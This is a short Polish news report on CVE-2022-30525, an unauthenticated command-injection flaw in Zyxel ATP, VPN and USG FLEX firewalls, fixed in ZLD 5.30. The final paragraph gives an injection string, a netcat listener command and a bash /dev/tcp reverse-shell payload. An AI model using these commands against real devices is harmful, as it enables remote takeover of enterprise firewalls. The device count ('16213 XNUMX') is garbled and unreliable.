W urządzeniach Zyxel z serii ATP, VPN i USG FLEX zidentyfikowano krytyczną lukę (CVE-2022-30525), która ma na celu organizację działania firewalli, IDS i VPN w przedsiębiorstwach, co pozwala zewnętrznemu atakującemu na wykonanie kodu na serwerze urządzenie bez uprawnień użytkownika bez uwierzytelnienia. Aby przeprowadzić atak, osoba atakująca musi mieć możliwość wysyłania żądań do urządzenia za pomocą protokołu HTTP/HTTPS. Zyxel naprawił lukę w aktualizacji oprogramowania ZLD 5.30. Według usługi Shodan w globalnej sieci znajduje się obecnie 16213 XNUMX potencjalnie podatnych na ataki urządzeń, które akceptują żądania za pośrednictwem protokołu HTTP/HTTPS.
Operacja odbywa się poprzez wysłanie specjalnie zaprojektowanych poleceń do modułu obsługi sieciowej /ztp/cgi-bin/handler, dostępnego bez uwierzytelniania. Problem wynika z braku odpowiedniego oczyszczenia parametrów żądania podczas wykonywania poleceń w systemie przy użyciu wywołania os.system używanego w bibliotece lib_wan_settings.py i wykonywanego podczas przetwarzania operacji setWanPortSt.
Na przykład osoba atakująca może przekazać ciąg „; ping 192.168.1.210;” co doprowadzi do wykonania w systemie polecenia „ping 192.168.1.210”. Aby uzyskać dostęp do powłoki poleceń, możesz uruchomić w swoim systemie polecenie „nc -lvnp 1270”, a następnie zainicjować połączenie zwrotne, wysyłając żądanie do urządzenia za pomocą znaku „; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Źródło: opennet.ru